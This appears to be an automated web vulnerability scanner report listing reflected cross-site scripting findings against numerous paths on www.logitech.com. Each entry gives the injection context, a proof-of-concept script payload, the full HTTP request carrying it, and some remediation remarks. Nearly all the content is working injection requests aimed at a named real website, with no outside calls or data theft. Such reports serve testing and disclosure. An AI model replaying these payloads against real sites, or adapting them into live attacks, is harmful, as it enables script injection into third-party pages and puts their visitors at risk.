<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cfc7"><script>alert(1)</script>0566d963f09 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTV/accessories9cfc7"><script>alert(1)</script>0566d963f09/devices/hd-powerline-200a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 113b7</script><script>alert(1)</script>53b52e7c2fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV/accessories113b7</script><script>alert(1)</script>53b52e7c2fe/devices/hd-powerline-200a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20935"><script>alert(1)</script>dbab6343445 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTV/accessories/devices20935"><script>alert(1)</script>dbab6343445/hd-powerline-200a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631ad</script><script>alert(1)</script>e38ac092677 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV/accessories/devices631ad</script><script>alert(1)</script>e38ac092677/hd-powerline-200a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa2ff"><script>alert(1)</script>bb5fa1e233a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTV/accessories/devices/hd-powerline-200aaa2ff"><script>alert(1)</script>bb5fa1e233a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30914</script><script>alert(1)</script>a166fb3382 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV/accessories/devices/hd-powerline-200a30914</script><script>alert(1)</script>a166fb3382 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 994f3"><script>alert(1)</script>17ba2f754fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us994f3"><script>alert(1)</script>17ba2f754fe/smartTV/apps HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65465</script><script>alert(1)</script>16b22f61ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /65465</script><script>alert(1)</script>16b22f61ef/smartTV/apps HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cce8b"%3b949744c5661 was submitted in the REST URL parameter 1. This input was echoed as cce8b";949744c5661 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-uscce8b"%3b949744c5661/smartTV/apps HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b916"><script>alert(1)</script>4d33a7790f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTV7b916"><script>alert(1)</script>4d33a7790f8/apps HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78207</script><script>alert(1)</script>da74b2e4d59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV78207</script><script>alert(1)</script>da74b2e4d59/apps HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74c85</script><script>alert(1)</script>06f262c05b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV/apps74c85</script><script>alert(1)</script>06f262c05b0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 422b0"><script>alert(1)</script>66b3828cd38 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTV/apps422b0"><script>alert(1)</script>66b3828cd38 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4efb"%3b08d2a5ee1d1 was submitted in the REST URL parameter 1. This input was echoed as f4efb";08d2a5ee1d1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usf4efb"%3b08d2a5ee1d1/smartTV/revue HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26830</script><script>alert(1)</script>c98deb77d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /26830</script><script>alert(1)</script>c98deb77d1a/smartTV/revue HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5b20"><script>alert(1)</script>7a279e8fa51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usa5b20"><script>alert(1)</script>7a279e8fa51/smartTV/revue HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad86c"><script>alert(1)</script>03fe25bfac6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTVad86c"><script>alert(1)</script>03fe25bfac6/revue HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26b2f</script><script>alert(1)</script>3487044ae45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV26b2f</script><script>alert(1)</script>3487044ae45/revue HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40b8e"><script>alert(1)</script>32f2845aeaa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTV/revue40b8e"><script>alert(1)</script>32f2845aeaa HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85ab5</script><script>alert(1)</script>3e04316e103 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV/revue85ab5</script><script>alert(1)</script>3e04316e103 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f62f"%3bb18f9d264a1 was submitted in the REST URL parameter 1. This input was echoed as 6f62f";b18f9d264a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us6f62f"%3bb18f9d264a1/smartTV/what-is-google-tv HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 320b4"><script>alert(1)</script>e2f9c4d2af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us320b4"><script>alert(1)</script>e2f9c4d2af/smartTV/what-is-google-tv HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d365</script><script>alert(1)</script>7a02f7262f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1d365</script><script>alert(1)</script>7a02f7262f2/smartTV/what-is-google-tv HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f77"><script>alert(1)</script>6b9847b5d46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTV72f77"><script>alert(1)</script>6b9847b5d46/what-is-google-tv HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14252</script><script>alert(1)</script>dc69c1a65ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV14252</script><script>alert(1)</script>dc69c1a65ad/what-is-google-tv HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c1d5"><script>alert(1)</script>e75ca83f9af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTV/what-is-google-tv8c1d5"><script>alert(1)</script>e75ca83f9af HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f89</script><script>alert(1)</script>dbf9bbdaf96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV/what-is-google-tv18f89</script><script>alert(1)</script>dbf9bbdaf96 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b64</script><script>alert(1)</script>47209d5eaf5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d4b64</script><script>alert(1)</script>47209d5eaf5/speakers-audio HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
